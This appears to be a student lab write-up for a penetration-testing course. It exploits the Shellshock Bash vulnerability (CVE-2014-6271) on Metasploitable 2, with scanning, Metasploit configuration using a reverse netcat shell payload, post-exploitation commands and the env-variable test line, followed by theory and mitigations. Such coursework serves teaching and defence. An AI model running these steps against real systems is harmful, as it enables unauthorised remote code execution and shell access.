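PoC details: 273eeae993584702cccd3891e36f4d582cbfd0e3

Source
Related vulnerability
Title: GNU Bash remote code execution vulnerability (CVE-2014-6271)
Description: GNU Bash is a shell (command language interpreter) written by the American software developer Brian J. Fox for the GNU Project. It runs on Unix-like operating systems (it is the default shell on Linux systems), can read and execute commands from standard input or from a file, and also incorporates some features of ksh and csh. GNU Bash 4.3 and earlier contain a security vulnerability that stems from the program not correctly handling function definitions inside environment variable values. A remote attacker can exploit this vulnerability with a specially crafted environment variable to execute arbitrary code. The following products and modules may be exploited: OpenSSH sshd ForceComman
Introduction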
# 🐚 Shellshock (CVE-2014-6271) – Exploitation & Analysis

## 📌 Overview
This is the practical assignment for **Vulnerability Assessment and Penetration Testing – II**, focusing on the exploitation and analysis of the **Shellshock vulnerability** (**CVE-2014-6271**).  
The work was conducted in a **controlled lab environment** using **Metasploitable 2** (target) and **Kali Linux** (attacker).

---

## 🛠 Tools Used
- 💻 **Kali Linux** – Attacker machine
- 🖥 **Metasploitable 2** – Vulnerable target
- 🔍 **Nmap** – Scanning & service detection
- 🎯 **Metasploit Framework** – Exploitation

---

## 🔍 Vulnerability Summary
- **Type:** Remote Code Execution (RCE)  
- **Affected Component:** GNU Bash (versions 1.14–4.3)  
- **Impact:** Execute arbitrary commands via specially crafted environment variables  
- **CVSS Score:** 10.0 (**Critical**)  
- **Exploitation Vector:** Often through HTTP headers to CGI scripts  

---

## ⚡ Lab Steps

### 1️⃣ Scan Target
```bash
nmap -sS -sV <target-ip>
```

### 2️⃣ Start Metasploit
```bash
msfconsole
```

### 3️⃣ Load Exploit Module
```
use exploit/multi/http/apache_mod_cgi_bash_env_exec
```

### 4️⃣ Configure Exploit
```
set RHOST <target-ip>
set TARGETURI /cgi-bin/status
set LHOST <your-kali-ip>
set PAYLOAD cmd/unix/reverse_netcat
```

### 5️⃣ Run Exploit
```
exploit
```

## 📸 Demonstration Includes
- 📡 Nmap scan results
- ⚙️ Metasploit configuration
- 🔄 Reverse shell session output
- 🛠 Post-exploitation commands:

```bash
whoami
uname -a
ifconfig
```
## 📖 Theoretical Background

### What is Shellshock?
Shellshock is a vulnerability in the GNU Bash shell that allows attackers to execute arbitrary commands by injecting them into environment variables.
Discovered in September 2014 and assigned CVE-2014-6271, it affects Bash v1.14 to v4.3.

### How It Works
Bash incorrectly processes function definitions passed in environment variables: it does not stop at the end of the function body and executes any extra commands that follow it.
On web servers that use CGI scripts, HTTP headers become environment variables, which creates an easy attack path.

Example:

```bash
env x='() { :;}; echo vulnerable' bash -c "echo test"
```

If Bash is vulnerable, it prints `vulnerable`.

### Impact
- Full Remote Code Execution (RCE) without authentication
- Exploitable via simple HTTP requests
- Used in botnets, worms, targeted attacks
- Affected millions of servers, routers, and IoT devices

### Real-World Exploits
- Yahoo Servers – Malware via CGI scripts
- Wopbot Botnet – Automated exploitation
- QNAP NAS – Remote shell access & malware
- Self-Replicating Worms – Spread to new vulnerable hosts

## 🛡 Prevention & Mitigation
- 🔄 Update Bash immediately
- 🚫 Disable unused CGI scripts
- 🔥 Use firewalls to block unnecessary traffic
- 🛡 Deploy Web Application Firewalls (WAF)
- 📜 Monitor HTTP request logs
- 👤 Apply Least Privilege principles

## ⚠️ Disclaimer

This project is for educational purposes only.
All testing was in a controlled lab environment.
❌ Do NOT use these techniques on systems without permission.

👨‍💻 Author: Janith Madhusankha  
🎓 Course: BICT (Hons) in Network & Security  
🏫 Institution: South Eastern University of Sri Lanka

File snapshot

```
[4.0K] /data/pocs/273eeae993584702cccd3891e36f4d582cbfd0e3
├── [3.2K] README.md
└── [717K] Shellshock (CVE-2014-6271) Exploitation and Analysis.pdf

0 directories, 2 files
```